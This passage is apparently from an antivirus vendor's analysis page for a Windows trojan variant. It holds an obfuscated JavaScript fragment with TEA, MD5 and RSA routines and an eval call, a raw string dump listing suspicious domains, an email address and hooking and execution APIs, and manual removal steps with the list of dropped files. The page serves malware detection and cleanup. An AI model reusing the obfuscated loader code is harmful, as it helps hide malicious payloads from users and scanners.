]=H&1f;G=0;F()}O.1b.2M=X(r){Y z;19(z=0;z<r.1c;  z){Y A=z,B;1a(1d==T){F();T=1u N;T.2y(L);19(G=0;G<L.1c;  G)L[G]=0;G=0}B=T.2x();r[A]=B}};N.1b.2y=X(r){Y z,A,B;19(z=0;1B>z;  z)W.S[z]=z;19(z=A=0;1B>z;  z)A=A W.S[z] r[z%r.1c]&1f,B=W.S[z],W.S[z]=W.S[A],W.S[A]=B;W.j=W.i=0};N.1b.2x=X(){Y r;W.i=W.i 1&1f;W.j=W.j W.S[W.i]&1f;r=W.S[W.i];W.S[W.i]=W.S[W.j];W.S[W.j]=r;Z W.S[r W.S[W.i]&1f]};Y U=1B;Z{2r:X(z,A,B){A="41";B="3";Y C=1u r;C.2P(A,B);Z C.26(z)}}}(),s="",a=0,g=[],x=[],y=0,u=0,m=[],t=[],n=!0;X e(){Z 1p.35(1r*1p.2z())}X j(r,B,z){1a(!z||4<z)z=4;19(Y A=0,D=B;D<B z;D  )A<<=8,A|=r[D];Z(A&1r)>>>0}X b(r,B,z){r[B 3]=z>>0&1f;r[B 2]=z>>8&1f;r[B 1]=z>>16&1f;r[B 0]=z>>24&1f}X w(r){1a(!r)Z"";19(Y B="",z=0;z<r.1c;z  ){Y A=59(r[z]).1F(16);1==A.1c&&(A="0" A);B =A}Z B}X v(r){19(Y B="",z=0;z<r.1c;z =2)B =2h.2i(1T(r.2j(z,2),16));Z B}X c(r){1a(!r)Z"";19(Y B=[],z=0;z<r.1c;z  )B[z]=r.1C(z);Z w(B)}X h(r){g=1t(8);x=1t(8);y=u=0;n=!0;a=0;Y B=r.1c,z=0;a=(B 10)%8;0!=a&&(a=8-a);m=1t(B a 10);g[0]=(e()&3m|a)&1f;19(z=1;z<=a;z  )g[z]=e()&1f;a  ;19(z=0;8>z;z  )x[z]=0;19(z=1;2>=z;)8>a&&(g[a  ]=e()&1f,z  ),8==a&&p();19(z=0;0<B;)8>a&&(g[a  ]=r[z  ],B--),8==a&&p();19(z=1;7>=z;)8>a&&(g[a  ]=0,z  ),8==a&&p();Z m}X q(r){Y B=0,z=1t(8),B=r.1c;t=r;1a(0!=B%8||16>B)Z 1d;x=l(r);a=x[0]&7;B=B-a-10;1a(0>B)Z 1d;19(Y A=0;A<z.1c;A  )z[A]=0;m=1t(B);u=0;y=8;a  ;19(A=1;2>=A;)1a(8>a&&(a  ,A  ),8==a&&(z=r,!f()))Z 1d;19(A=0;0!=B;)1a(8>a&&(m[A]=(z[u a]^x[a])&1f,A  ,B--,a  ),8==a&&(z=r,u=y-8,!f()))Z 1d;19(A=1;8>A;A  ){1a(8>a){1a(0!=(z[u a]^x[a]))Z 1d;a  }1a(8==a&&(z=r,u=y,!f()))Z 1d}Z m}X p(){19(Y r=0;8>r;r  )g[r]=n?g[r]^x[r]:g[r]^m[u r];19(Y B=k(g),r=0;8>r;r  )m[y r]=B[r]^x[r],x[r]=g[r];u=y;y =8;a=0;n=!1}X k(r){Y B=16,z=j(r,0,4);r=j(r,4,4);19(Y A=j(s,0,4),D=j(s,4,4),C=j(s,8,4),E=j(s,12,4),F=0;0<B--;)F =2o,F=(F&1r)>>>0,z =(r<<4) A^r F^(r>>>5) D,z=(z&1r)>>>0,r =(z<<4) C^z F^(z>>>5) E,r=(r&1r)>>>0;B=1t(8);b(B,0,z);b(B,4,r);Z B}X l(r){Y B=16,z=j(r,0,4);r=j(r,4,4);19(Y A=j(s,0,4),D=j(s,4,4),C=j(s,8,4),E=j(s,12,4),F=3y;0<B--;)r-=(z<<4) C^z F^(z>>>5) E,r=(r&1r)>>>0,z-=(r<<4) A^r F^(r>>>5) D,z=(z&1r)>>>0,F-=2o,F=(F&1r)>>>0;B=1t(8);b(B,0,z);b(B,4,r);Z B}X f(){19(Y r=0;8>r;r  )x[r]^=t[y r];x=l(x);y =8;a=0;Z!0}X o(r,B){Y z=[];1a(B)19(Y A=0;A<r.1c;A  )z[A]=r.1C(A)&1f;1h 19(Y D=0,A=0;A<r.1c;A =2)z[D  ]=1T(r.2j(A,2),16);Z z}Y 1D={26:X(r,B){Y z=o(r,B),z=h(z);Z w(z)},2p:X(r,B){19(Y z=o(r,B),z=h(z),A="",D=0;D<z.1c;D  )A =2h.2i(z[D]);Z d.2q(A)},3X:X(r){r=o(r,!1);r=q(r);Z w(r)},2g:X(r,B){s=o(r,B)},4g:v,28:c,4y:w,4C:o},d={2s:"=",2t:"4S /",2u:X(r,B){Y z=r.1C(B);1a(1f<z)2v"53: 54 34 5";Z z},2q:X(r){1a(1!=2w.1c)2v"37: 38 39 2w";Y B=d.2s,z=d.2t,A=d.2u,D,C,E=[];r="" r;Y F=r.1c-r.1c%3;1a(0==r.1c)Z r;19(D=0;D<F;D =3)C=A(r,D)<<16|A(r,D 1)<<8|A(r,D 2),E.1y(z.1l(C>>18)),E.1y(z.1l(C>>12&1J)),E.1y(z.1l(C>>6&1J)),E.1y(z.1l(C&1J));3e(r.1c-F){2B 1:C=A(r,D)<<16;E.1y(z.1l(C>>18) z.1l(C>>12&1J) B B);3g;2B 2:C=A(r,D)<<16|A(r,D 1)<<8,E.1y(z.1l(C>>18) z.1l(C>>12&1J) z.1l(C>>6&1J) B)}Z E.2C("")}},2D=1,3j="",1n=8,2F=32;X 1W(r){Z 2H(r)}X 2H(r){Z 2l(1E(1K(r),r.1c*1n))}X 3q(r){Z 2d(1E(1K(r),r.1c*1n))}X 3s(r,B){Z 2l(1R(r,B))}X 3u(r,B){Z 3v(1R(r,B))}X 3w(r,B){Z 2d(1R(r,B))}X 1E(r,B){r[B>>5]|=2I<<B2;r[(B 3x>>>9<<4) 14]=B;19(Y z=3z,A=-3A,D=-3B,C=3C,E=0;E<r.1c;E =16)Y F=z,O=A,N=D,H=C,z=1j(z,A,D,C,r[E 0],7,-3E),C=1j(C,z,A,D,r[E 1],12,-3F),D=1j(D,C,z,A,r[E 2],17,3H),A=1j(A,D,C,z,r[E 3],22,-3J),z=1j(z,A,D,C,r[E 4],7,-3K),C=1j(C,z,A,D,r[E 5],12,3L),D=1j(D,C,z,A,r[E 6],17,-3M),A=1j(A,D,C,z,r[E 7],22,-3N),z=1j(z,A,D,C,r[E 8],7,3O),C=1j(C,z,A,D,r[E 9],12,-3P),D=1j(D,C,z,A,r[E 10],17,-3Q),A=1j(A,D,C,z,r[E 11],22,-3R),z=1j(z,A,D,C,r[E 12],7,3S),C=1j(C,z,A,D,r[E 13],12,-3U),D=1j(D,C,z,A,r[E 14],17,-3V),A=1j(A,D,C,z,r[E 15],22,3W),z=1g(z,A,D,C,r[E 1],5,-3Y),C=1g(C,z,A,D,r[E 6],9,-3Z),D=1g(D,C,z,A,r[E 11],14,40),A=1g(A,D,C,z,r[E 0],20,-42),z=1g(z,A,D,C,r[E 5],5,-43),C=1g(C,z,A,D,r[E 10],9,44),D=1g(D,C,z,A,r[E 15],14,-45),A=1g(A,D,C,z,r[E 4],20,-46),z=1g(z,A,D,C,r[E 9],5,47),C=1g(C,z,A,D,r[E 14],9,-49),D=1g(D,C,z,A,r[E 3],14,-4a),A=1g(A,D,C,z,r[E 8],20,4b),z=1g(z,A,D,C,r[E 13],5,-4c),C=1g(C,z,A,D,r[E 2],9,-4d),D=1g(D,C,z,A,r[E 7],14,4e),A=1g(A,D,C,z,r[E 12],20,-4f),z=1i(z,A,D,C,r[E 5],4,-4h),C=1i(C,z,A,D,r[E 8],11,-4i),D=1i(D,C,z,A,r[E 11],16,4j),A=1i(A,D,C,z,r[E 14],23,-4l),z=1i(z,A,D,C,r[E 1],4,-4m),C=1i(C,z,A,D,r[E 4],11,4n),D=1i(D,C,z,A,r[E 7],16,-4o),A=1i(A,D,C,z,r[E 10],23,-4p),z=1i(z,A,D,C,r[E 13],4,4q),C=1i(C,z,A,D,r[E 0],11,-4r),D=1i(D,C,z,A,r[E 3],16,-4s),A=1i(A,D,C,z,r[E 6],23,4t),z=1i(z,A,D,C,r[E 9],4,-4u),C=1i(C,z,A,D,r[E 12],11,-4v),D=1i(D,C,z,A,r[E 15],16,4w),A=1i(A,D,C,z,r[E 2],23,-4x),z=1k(z,A,D,C,r[E 0],6,-4z),C=1k(C,z,A,D,r[E 7],10,4A),D=1k(D,C,z,A,r[E 14],15,-4B),A=1k(A,D,C,z,r[E 5],21,-4D),z=1k(z,A,D,C,r[E 12],6,4E),C=1k(C,z,A,D,r[E 3],10,-4F),D=1k(D,C,z,A,r[E 10],15,-4G),A=1k(A,D,C,z,r[E 1],21,-4H),z=1k(z,A,D,C,r[E 8],6,4I),C=1k(C,z,A,D,r[E 15],10,-4J),D=1k(D,C,z,A,r[E 6],15,-4K),A=1k(A,D,C,z,r[E 13],21,4L),z=1k(z,A,D,C,r[E 4],6,-4M),C=1k(C,z,A,D,r[E 11],10,-4N),D=1k(D,C,z,A,r[E 2],15,4O),A=1k(A,D,C,z,r[E 9],21,-4P),z=1v(z,F),A=1v(A,O),D=1v(D,N),C=1v(C,H);Z 16==2F?[A,D]:[z,A,D,C]}X 1M(r,B,z,A,D,C){Z 1v(2X(1v(1v(B,r),1v(A,C)),D),z)}X 1j(r,B,z,A,D,C,E){Z 1M(B&z|~B&A,r,B,D,C,E)}X 1g(r,B,z,A,D,C,E){Z 1M(B&A|z&~A,r,B,D,C,E)}X 1i(r,B,z,A,D,C,E){Z 1M(B^z^A,r,B,D,C,E)}X 1k(r,B,z,A,D,C,E){Z 1M(z^(B|~A),r,B,D,C,E)}X 1R(r,B){Y z=1K(r);16<z.1c&&(z=1E(z,r.1c*1n));19(Y A=1t(16),D=1t(16),C=0;16>C;C  )A[C]=z[C]^4T,D[C]=z[C]^4U;z=1E(A.2Y(1K(B)),4W B.1c*1n);Z 1E(D.2Y(z),4X)}X 1v(r,B){Y z=(r&1G) (B&1G);Z(r>>16) (B>>16) (z>>16)<<16|z&1G}X 2X(r,B){Z r<<B|r>>>32-B}X 1K(r){19(Y B=[],z=(1<<1n)-1,A=0;A<r.1c*1n;A =1n)B[A>>5]|=(r.1C(A/1n)&z)<<A2;Z B}X 2d(r){19(Y B="",z=(1<<1n)-1,A=0;A<32*r.1c;A =1n)B =2h.2i(r[A>>5]>>>A2&z);Z B}X 2l(r){19(Y B=2D?"4Y":"4Z",z="",A=0;A<4*r.1c;A  )z =B.1l(r[A>>2]>>A%4*8 4&15) B.1l(r[A>>2]>>A%4*8&15);Z z}X 2Z(r){19(Y B=[],z=0;z<r.1c;z =2)B.1y("\\\\x" r.2j(z,2));B=B.2C("");51("Y 31 = \'" B "\'");Z 31}X 33(r,B,z,A){z=z||"";r=r||"";r=A?r:1W(r);A=2Z(r);r=1W(A B);A=1O.2r(A);Y D=(A.1c/2).1F(16),C=1D.28(z.55());19(z="56" z.1c.1F(16);4>D.1c;)D="0" D;1D.2g(r);B=1D.2p(D A 1D.28(B) z C);1D.2g("");Z B.57(/[\\/\\ =]/g,X(r){Z{"/":"-"," ":"*","=":"58"}[r]})}X 4Q(r,B,z){Z 33(r,B,z,!1)};',62,320,'||||||||||||||||||||||||||||||||||||||||||||||||||||||||||this|function|var|return||||||||||for|if|prototype|length|null|DB|255|md5_gg|else|md5_hh|md5_ff|md5_ii|charAt|subTo|chrsz|DV|Math|clamp|4294967295|DM|Array|new|safe_add|abs|ZERO|push|am|reduce|256|charCodeAt|TEA|core_md5|toString|65535|compareTo|copyTo|63|str2binl|dlShiftTo|md5_cmn|32767|RSA|floor|divRemTo|core_hmac_md5|fromString|parseInt|ONE|mulTo|md5|multiplyTo|sqrTo|negate||||||squareTo|encrypt|F1|strToBytes|F2|mp|drShiftTo|fromInt|binl2str|convert|mpl|initkey|String|fromCharCode|substr|lShiftTo|binl2hex|revert|rShiftTo|2654435769|enAsBase64|encode|rsa_encrypt|PADCHAR|ALPHA|getbyte|throw|arguments|next|init|random|0123456789abcdefghijklmnopqrstuvwxyz|case|join|hexcase|exp|mode|isEven|hex_md5|128|mod|FV|1073741823|nextBytes|bitLength|uv_alert|setPublic|modPowInt|doPublic|mt2|um|mph|invDigit|typeof|bit_rol|concat|hexchar2bin||temp||getEncryption|Exception|round||SyntaxError|Not|enough|Message|min|too|pow|switch|long|break|dmq1|fromNumber|b64pad|Date|Invalid|248|97|toRadix|public|str_md5|key|hex_hmac_md5|65536|b64_hmac_md5|binl2b64|str_hmac_md5|64|3816266640|1732584193|271733879|1732584194|271733878|65|680876936|389564586|getTime|606105819|fromRadix|1044525330|176418897|1200080426|1473231341|45705983|1770035416|1958414417|42063|1990404162|1804603682|string|40341101|1502002290|1236535329|decrypt|165796510|1069501632|643717713|F20CE00BAE5361F8FA3AE9CEFA495362FF7DA1BA628F64A347F0A8C012BF0B254A30CD92ABFFE7A6EE0DC424CB6166F8819EFA5BCCB20EDFB4AD02E412CCF579B1CA711D55B8B0B3AEB60153D5E0693A2A86F3167D7847A0CB8B00004716A9095D9BADC977CBB804DBDCBA6029A9710869A453F27DFDDF83C016D928B3CBF4C7|373897302|701558691|38016083|660478335|405537848|568446438||1019803690|187363961|1163531501|1444681467|51403784|1735328473|1926607734|bytesToStr|378558|2022574463|1839030562|dmp1|35309556|1530992060|1272893353|155497632|1094730640|681279174|358537222|722521979|76029189|640364487|421815835|530742520|995338651|bytesInStr|198630844|1126891415|1416354905|dataFromStr|57434055|1700485571|1894986606|1051523|2054922799|1873313359|30611744|1560198380|1309151649|145523070|1120210379|718787259|343485551|Hs|max|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|909522486|1549556828|coeff|512|640|0123456789ABCDEF|0123456789abcdef|number|eval||INVALID_CHARACTER_ERR|DOM|toUpperCase|000|replace|_|Number'.split('|'),0,{}))

VBScript.RegExp

km.7532.com

shenglin_yu@126.com

km.7532.comr

VVV.7532.com

VVV.7532.comt

7532.com

|*.txt

%d&&'

123456789

00003333

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

MSH_SCROLL_LINES_MSG

MSWHEEL_ROLLMSG

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

WINMM.dll

WS2_32.dll

VERSION.dll

RASAPI32.dll

GetProcessHeap

WinExec

GetKeyState

GetViewportOrgEx

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

OLEAUT32.dll

oledlg.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

WININET.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

;3 #>6.&

'2, / 0&7!4-)1#

VVV.dywt.com.cn

(*.htm;*.html)|*.htm;*.html

its:%s::%s

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

zcÁ

3 ,,25%!4

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

1, 0, 6, 6

!"#$%&'()* ,-

25, 0, 0, 1

Windows

(*.*)

5.9.0.0

%original file name%.exe_3188_rwx_10001000_00039000:

L$(h%f

SSh0j

msctls_hotkey32

TVCLHotKey

THotKey

\skinh.she

}uo,x6l5k%x-l h

9p%s m)t4`#b

e"m?c&y1`Ð<

SetViewportOrgEx

SetViewportExtEx

SetWindowsHookExA

UnhookWindowsHookEx

EnumThreadWindows

EnumChildWindows

`c%US.4/

!#$<#$#=

.text

`.rdata

@.data

.rsrc

@.UPX0

`.UPX1

`.reloc

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\kjkjz1[1].htm (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\gjgg[1].htm (3261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\4473463[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\qqkjz13[1].htm (503 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ssggd1[1].htm (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EE3IW6XC.txt (231 bytes)
C:\dc.dll (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017062020170621\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjzgg1[1].htm (1466 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T62H1GAA.txt (231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg456[1].htm (1539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\qqkjz12[1].htm (1273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjz11[1].htm (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\57FH349C.txt (77 bytes)
C:\SkinH_EL.dll (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\mcgg[1].htm (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GN113R0R.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G380XWV8.txt (77 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Strictor.70570_89f4a39f82

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Strictor.70570_89f4a39f82

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet